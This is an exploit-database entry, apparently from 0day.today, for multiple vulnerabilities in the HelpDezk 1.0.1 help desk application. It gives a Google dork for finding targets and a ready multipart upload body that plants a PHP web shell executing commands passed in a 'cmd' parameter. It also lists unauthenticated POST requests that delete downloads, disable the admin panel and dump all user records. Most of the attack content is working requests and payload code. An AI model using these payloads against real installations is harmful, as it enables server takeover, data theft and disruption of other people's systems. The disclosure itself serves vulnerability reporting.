HelpDezk 1.0.1 Shell Upload / Code Execution / Disclosure Vulnerabilities

2015-03-03T00:00:00
ID 1337DAY-ID-23342
Type zdt
Reporter Dennis Veninga
Modified 2015-03-03T00:00:00

Description

HelpDezk version 1.0.1 suffers from remote shell upload, code execution, and information disclosure vulnerabilities.

                                        
                                            # Exploit Title: HelpDezk 1.0.1 Multiple Vulnerabilities
# Google Dork: "intext: helpdezk-community-1.0.1"
# Date: 26-2-2015
# Exploit Author: Dennis Veninga
# Vendor Homepage: http://www.helpdezk.org/
# Vendor contacted: 26-2-2015
# Version: 1.0.1
# Tested on: Firefox 36 & Chrome 38 / W8.1-x64

HelpDezk ->
Version:       1.0.1
Type:          Multiple Critical Vulnerabilities
Severity:       Critical
Info Exploit:      Different exploits making it possible to take over the website/server

- Arbitrary File Upload
- Remote Command Execution
- User Information Disclosure

###############################################
Arbitrary File Upload, 2 ways ->
1. Direct Access:
http://{target}/helpdezk/admin/logos/upload
#########

2. POST: http://localhost/helpdezk/admin/logos/upload
After posting this, visit http://{target}/helpdezk/app/uploads/logos/shell.php?cmd=whoami

CONTENT: 
-----------------------------14463264629720\r\n
Content-Disposition: form-data; name="file"; filename="shell.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n
<?php\r\n
if(isset($_REQUEST['cmd'])){\r\n
$cmd = ($_REQUEST["cmd"]);\r\n
system($cmd);\r\n
echo "</pre>$cmd<pre>";\r\n
die;\r\n
}\r\n
?>\r\n
-----------------------------14463264629720--\r\n

###############################################
Remote Command Execution, you see an white page with 'ok' when SUCCESS!

Delete a download
POST: http://localhost/helpdezk/admin/downloads/delete
CONTENT: id={IDNUMBER}  

Deactivate admin panel: *use /activate and id={IDNUMBER} to activate again*
POST: http://{localhost}/helpdezk/admin/modules/deactivate
CONTENT: id=1

id=1 = Admin
id=2 = Dashboard
id=3 = HelpDezk
###############################################
User Information Disclosure
NOTE: Stop javascript, else it will quickly show all info and returns you to the login page.

POST: http://{target}/helpdezk/admin/relPessoa/table_json/
CONTENT: typeperson=ALL
###############################################

I'm sure I didn't find everything, but maybe time to fix those huge issues first!

#  0day.today [2018-02-16]  #